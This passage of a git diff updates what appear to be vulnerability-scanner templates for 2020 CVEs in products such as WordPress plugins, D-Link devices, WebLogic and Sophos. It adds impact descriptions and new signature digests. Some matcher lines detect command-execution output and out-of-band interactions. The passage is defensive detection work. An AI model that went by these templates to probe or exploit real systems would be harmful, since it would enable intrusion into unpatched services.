   description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022042b88eda8f9c15a13ce3bc78364a63be7cd523c3ffaa61e48d05eb9a6b4a8e3502201266eb46bc2a8d30441847bff2858f25c6834564c19c64f3f68989f83075df3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100acbba5e5023684f88cd6915bdf64e32756dbbbba609823599ca55921766cc687022025b98e925129614166d44dfb2ac5e8e56b6d6980dcd29af9e0828b0ab096adf3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml
index 0344740044..baee6c1117 100644
--- a/http/cves/2020/CVE-2020-23575.yaml
+++ b/http/cves/2020/CVE-2020-23575.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: |
     Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c8b11213e752726c773c74a8b4f5aa28528fe934a550395bbc41ec49c4de0676022100a09e315e33aa620f68d55a5b3909d5cb6393456418d978778ac4f596e80bc39d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205389958ac557cbb8e48fc125d17c4e643503899b25bceb889425c9b3960c570d02206570c0035f6e5f46a70cc57ce20e762642d57473366225d4ffe54ad3a5d7e755:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml
index 68a46227a3..13249d91df 100644
--- a/http/cves/2020/CVE-2020-23697.yaml
+++ b/http/cves/2020/CVE-2020-23697.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the page feature in admin/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
           - 'id="csrf" name="csrf" value="(.*)">'
         internal: true
         part: body
-# digest: 4a0a00473045022100bcd43df6f7a0fbbda6f99bb5d6ceb9af5f6ec854517d95dec7a9b58e6d9695a0022059e20076b3be418a2c52f33ed7894d99b50f9a441727c4ac4f61bceb25d54f72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f8d761a8b9e0364bc45e22c515f590aeaab993e75944f17e25f19dcc26585bbc022100fb6256cdf3907220e8955a6897a6526a2b9f292ee04d2958a155dfd703c0718d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml
index 559105da78..5df1b2e07d 100644
--- a/http/cves/2020/CVE-2020-23972.yaml
+++ b/http/cves/2020/CVE-2020-23972.yaml
@@ -7,6 +7,8 @@ info:
   description: |
     Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
     without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.
   remediation: |
     Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.
   reference:
@@ -67,4 +69,4 @@ http:
         regex:
           - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
         part: body
-# digest: 4b0a00483046022100a93ba81c26efa23beddc2f9a7350f2c559e04829f2ad5806e38615170de3824d02210096a1ce6a5faabe487255a8b526fd283b1e60e35bed0a3f9bb98854bec62b7d5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220751c057dc4fe87146c6f320ed59aaec6426d3188de7ccb0fdd6e2e84e8be4944022100c674bf97e6367563e03827d1b0fe51fece2d94879cc6ed4409eb0b42cd713b4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml
index 64dc3d9a4c..87517cf24f 100644
--- a/http/cves/2020/CVE-2020-24148.yaml
+++ b/http/cves/2020/CVE-2020-24148.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.
+  impact: |
+    An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 490a0046304402202ed6aa861f8689ccb37303a1a0fa199e95a75121c31253c6663c50a70574ed18022008ab2ae6bf5c73069a10025f8b8f5a3d199563c68959a27e9675d80ba8816d69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cb4820fc1ec574bf0fb0afcccd7044a6c34c06bfa692964fb1db2486c61fad75022100d1f2967f5e871639dc6d4b2b01631f3fa5701e1029648d5a28004caf8ad0f673:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml
index daaff822cb..72169167f8 100644
--- a/http/cves/2020/CVE-2020-24186.yaml
+++ b/http/cves/2020/CVE-2020-24186.yaml
@@ -5,6 +5,8 @@ info:
   author: Ganofins
   severity: critical
   description: WordPress wpDiscuz plugin versions  version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
+  impact: |
+    Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.
   remediation: |
     Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.
   reference:
@@ -94,4 +96,4 @@ http:
         regex:
           - '"url":"([a-z:\\/0-9-.]+)"'
         part: body
-# digest: 4a0a00473045022008236a88fdd179b36de97f072bfa2a063d34872a44e4027676f3c6ea1d974570022100ae1ae2a3266e9d411a8204a6d657aa83a2634840baaa9d14aa5293d3f1fe16fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022006b7dafe39f9b222cb3c626506ecefd1faff984b65d5519ef8d3171f49fac090022100b3077555b834b1d9febe6e966d084db0fa4f8f92ebdcaf03e06fc64bcdffbba4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml
index a7f3ea4752..55b15281d5 100644
--- a/http/cves/2020/CVE-2020-24223.yaml
+++ b/http/cves/2020/CVE-2020-24223.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100aae58904011b4ffb96b383d6e0c63b1972e0785f10e832f698997e821c395c3c0221008608bd6ee56987295a895930392539b173228ed9ab4028fe2d193543e65ae91b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204f9a50d8404c6f49f7986c87776fe0da924133deed993db1da09d827b4a7d56c022012ba8aeba24d33343742c5fc2f2b195b2e67e406a006af11e4d9d6717025b69e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml
index e28f710073..3211fee1c4 100644
--- a/http/cves/2020/CVE-2020-24312.yaml
+++ b/http/cves/2020/CVE-2020-24312.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information, such as database backups, configuration files, and other sensitive data.
   remediation: |
     Update the WordPress Plugin File Manager (wp-file-manager) to the latest version to mitigate the backup disclosure vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100abbd9a10ca001d51b77dca8cd8d127b2e8484ecb3251b19f5ed784e013fe7a3d0221008978dd27351345bf138501a9a3fe6c72390e3cd7edcefdb2d72d2e5fab18b084:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ecf1836e0b63f3cae2cc1cdddeb8d05b39b3b998951c9a49724c039bc246769302201592dfa1b4db9cc892f8426a9aed34403f6ffacea6e903dc9a16d8b7bb031cae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml
index c59eaa0337..ab61740132 100644
--- a/http/cves/2020/CVE-2020-24391.yaml
+++ b/http/cves/2020/CVE-2020-24391.yaml
@@ -5,6 +5,8 @@ info:
   author: leovalcante
   severity: critical
   description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: regex
         regex:
           - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
-# digest: 490a00463044022032b4d22d30a02282c37ade5aa8ef85a01abcbc8555c1d11cf39f597a2b5775ff0220341eb58b94ea132722be8e732add28cab98bf351ab13ff7e6bd8277efa6fd0f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c7b3749f58afbd26dbff7bf2760b377efd091aaedaee78871464c4f2af766bba02203a21ebed33ae18029ca4eb7e54c8e937a913176f79857d2e5e319ae395565907:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml
index e4be8b12ad..2d593b0262 100644
--- a/http/cves/2020/CVE-2020-24550.yaml
+++ b/http/cves/2020/CVE-2020-24550.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Upgrade to EpiServer Find version 13.2.7 or later to fix the open redirect vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 301
-# digest: 490a00463044022043cf60b2a7aa5df25eab0bf3f56716208bef054c6ce474e3b18f90db963a8a01022014413b9eca8afaae85cb3bce7cffe2de80c276a6e146fbabd5dae9613b3bfa9a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202be7e7952960a95ef077363e0fafd21f3221d2945fc6e492f385f681abfd6108022100a8b08388117b6cad4420dcc97faad309c371357079eaaa43565dda663e3b5816:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml
index eacec25323..321bc9783e 100644
--- a/http/cves/2020/CVE-2020-24571.yaml
+++ b/http/cves/2020/CVE-2020-24571.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
   remediation: |
     Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022036ba9e33df097d9fa95a880280ff359c4f5db451dc409a8a32222ed97e0c39dd022062b97e5e6dfd158fd86e0046ac289893ca73d71364e828efab601177a4ac8438:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220494f20d6194a50db58d80b043646fcfd2e4f28775408818a22d4d917e95532d602201a76856d250bb11153c7edb80cad0292d1ac4dc50e95a34a4862d0cd1185c184:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml
index 660fe22776..05fc9e3256 100644
--- a/http/cves/2020/CVE-2020-24579.yaml
+++ b/http/cves/2020/CVE-2020-24579.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router.
   remediation: |
     Apply the latest firmware update provided by D-Link to fix the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022066825dd4593750f0122105c01826fc3559341f4a6662e9b085d5fd1ab9fa7ff0022059d4f2342deefcd271443cd144a0ee7ad47b1173e0d0ddb61166a34bb0c41037:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200b01fb4e47c1d7f542fdeb98293ef27ec798f8ac28d4974910ed1057bc8cf453022100fdc6bfcb7f97e55a604a5b5a93904d8fed4de189e620c46cf04be9c745d41b09:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml
index a6fe78b5a4..bf41ae66fe 100644
--- a/http/cves/2020/CVE-2020-24589.yaml
+++ b/http/cves/2020/CVE-2020-24589.yaml
@@ -5,6 +5,8 @@ info:
   author: lethargynavigator
   severity: critical
   description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.
   remediation: |
     Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
   reference:
@@ -44,4 +46,4 @@ http:
         part: body
         words:
           - "Failed to install the generic artifact type"
-# digest: 490a00463044022026b94963892f1238e0ae25d7b6ace28c8f69b13e9ec04341f5cd2332a4016ce80220320a8467ae334a1011ddb6583e474fbbef29f919ae8502854b2d1083da18fbb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022032b25ff8647daa6df12d960190417c6258e22a4beedb1627b5bfbba89ced2077022100c6a958e4edeeb3ba2c315ac5318dcfa509541aa67d52c520e656ccc226f52025:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml
index 8a4528e44e..fda7312efd 100644
--- a/http/cves/2020/CVE-2020-24902.yaml
+++ b/http/cves/2020/CVE-2020-24902.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206857fe775fe1f8cd8d457637ccf4959aafa4098dfe846cfb954dff46b908641302203d428489c024ea6532f1b90854fbdb145afd1c7f1a0417fd093c9787b42101bf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100aa9897a5c15787ac9771d21821377b426238c0bce5129ad08e1edf7c60c0124d02203209e79a5f5f2d5de7d0bfcf1485c770d07d8694a3afd1d8426846cc02e62b84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml
index 2591018b5d..79f7683f4e 100644
--- a/http/cves/2020/CVE-2020-24903.yaml
+++ b/http/cves/2020/CVE-2020-24903.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220399b9322656d5e71256dd1dc33c3a9d126cd24f37e2c5698c272f6d80cf35fc9022010a6b87b0ce2aef4d0843ca15a8a98d9e8c56d1bb5c288202167113e8ebeca52:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022015e43493cde5849e169bf136537e219a438db6afe7333462230f251a4419f416022052017871c8cf4ed41372766aa235ee938991f6775718ba065073c7bfc5d97beb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml
index 49be68c009..9d17bf40a5 100644
--- a/http/cves/2020/CVE-2020-24912.yaml
+++ b/http/cves/2020/CVE-2020-24912.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
         part: header
         words:
           - 'Content-Type: text/html'
-# digest: 4a0a004730450220028d1cc44b831a88ba9cdbdfccc03ad9380672982aedb982be39ea7f4a8592fb02210089d6d57e3240f86437104d6ffa521c4eed252a5c0da0814d74ef8ce2f0ca79a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cdd282af5dc05652a55f512a03f1a11ab97058a78e5f59db0947512920f7a87202205e9c8191f6a7f2a46bc62e11c5429bb5440660214215155aebe27d779fc92204:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml
index aedf5d4b84..e47a8817d5 100644
--- a/http/cves/2020/CVE-2020-24949.yaml
+++ b/http/cves/2020/CVE-2020-24949.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: high
   description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system, potentially leading to full compromise.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b8522071f21334a668fef36e052cc29cc8b6b607fbd3e1c4c570bf42dfb659b502207a3a0cd49a71c6823f958401a7b29bdce64c463ee414e06be66018f31916da97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bcc327b9442bf3bd9ce7fb3f3128441f55e41b2bae26e6c3e3b8ea2700120ea3022075066ec38bc10efb42f5ce3c61182e3819ae6afde497d952f757013c4141a5b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml
index d25a310fb4..eb04eaded2 100644
--- a/http/cves/2020/CVE-2020-25078.yaml
+++ b/http/cves/2020/CVE-2020-25078.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the  /config/getuser endpoint allows for remote administrator password disclosure.
+  impact: |
+    An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera.
   remediation: |
     Update the camera firmware to the latest version to fix the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220340b74fc1fdefd4787b6eb1a0a2196f97595c847bb67cdec83d1355fdf99f2a9022063c6e3fd20fad9bf83380511d5001c625331c29de320f004ec4eecfdc37391d6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e965d262bb31eb40082be9dfd1296f5217892a6ab1cad51a285a6850e71a4188022079f8d8c381d12c0f12d84b30b0f73f9e788040d9f6155311dd1ded7cdf85806a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml
index 9faa8ea0a7..ef8a71c607 100644
--- a/http/cves/2020/CVE-2020-25213.yaml
+++ b/http/cves/2020/CVE-2020-25213.yaml
@@ -7,6 +7,8 @@ info:
   author: foulenzer
   severity: critical
   description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
   remediation: |
     Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability.
   reference:
@@ -77,4 +79,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d1d02a58b719f23b287c0f7d00d79c0982748802612508afe5581fa59ff09bfd022031cc169d591b5be27be404c646049f355b4874fa92275b5cd13153e7444cad86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008e97e4ced7402b3b0097b23d9e1d0c7f787c1561cd5dbd3c5630d5a404d6b5b8022003b7f10b1fc50245dff30955eb16945431a13aaade3b4b5b7239384954049587:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml
index 8ae26fb694..c509814caf 100644
--- a/http/cves/2020/CVE-2020-25223.yaml
+++ b/http/cves/2020/CVE-2020-25223.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.
   remediation: |
     Apply the latest security patches provided by Sophos to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a004830460221009764201c6a710204a7158172b9ab6f1dec288cf1845038403e1092da068c9efe022100a3eec2f3df7c12e792d97dce8cd84e77b85575ca28b84da38203b99929aaa80e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bc0100644ca6b234e05e063d5a68280f7fe18176fa3c55acdf151f90a715bb7f02202470e0c8404727cd426b1314cc356d25713139ad9ead25dc6e8286e2fad3ffab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml
index c0a030f85e..4b178352c7 100644
--- a/http/cves/2020/CVE-2020-25495.yaml
+++ b/http/cves/2020/CVE-2020-25495.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts or steal sensitive information from users.
   remediation: |
     Apply the latest security patches or updates provided by Xinuo to fix the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205b9ea2f6d735ae6e7cdf31a54cbb17c7c528c64472e3e84707c184c3c87273220220485d7af247c87e6ecae089936669adcfd37a7c5ca0826aa8fc25261dbce906d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220491fccd82a36cda94232ddb7dda7faaa7e34083a54147256301a967ea4b03a5d022100bb881c72bbed3ff7528f2853d38455eb795b4ee19cc3267c408dada17beec61e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml
index c7ed116512..d86d6467ca 100644
--- a/http/cves/2020/CVE-2020-25506.yaml
+++ b/http/cves/2020/CVE-2020-25506.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.
   remediation: |
     Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: {{useragent}}"
-# digest: 4b0a00483046022100d6753bf1c233b412bbdea511e47d12751aaf94c355ea5357d5aa18efb91fafff022100c8d8d0d3b7920b607c578459d03b9f594fdd6343105037e4e48f717673f31381:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e65d494ec1d24317eb1530788b71409f643a05e4bf9743bd0528a5750b2a31fb022100946d0e80d9114e2cd6f6ff415be89bbf9ffafada6033376797a9e87beec7aca6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml
index ef54350a31..0345b53a4d 100644
--- a/http/cves/2020/CVE-2020-2551.yaml
+++ b/http/cves/2020/CVE-2020-2551.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by Oracle to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202d8a69746c639934d4dbdcfe15d354f7fbfc8e95ba4c43548f41776b7f24151e0221008e9e7ee4f80b974769671ee85ef1f3f6756c978245d398d6cfb5a752ec1b8c03:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220506888032ffd40ea72485d56befb2bd5bc590296fbd194447800f35c662ea42102205b89e802661fa3ed02111095f81a1d41a3c0a6f1db1622a441d8fd3750a12bf5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml
index 4a433266b4..e74179974f 100644
--- a/http/cves/2020/CVE-2020-25540.yaml
+++ b/http/cves/2020/CVE-2020-25540.yaml
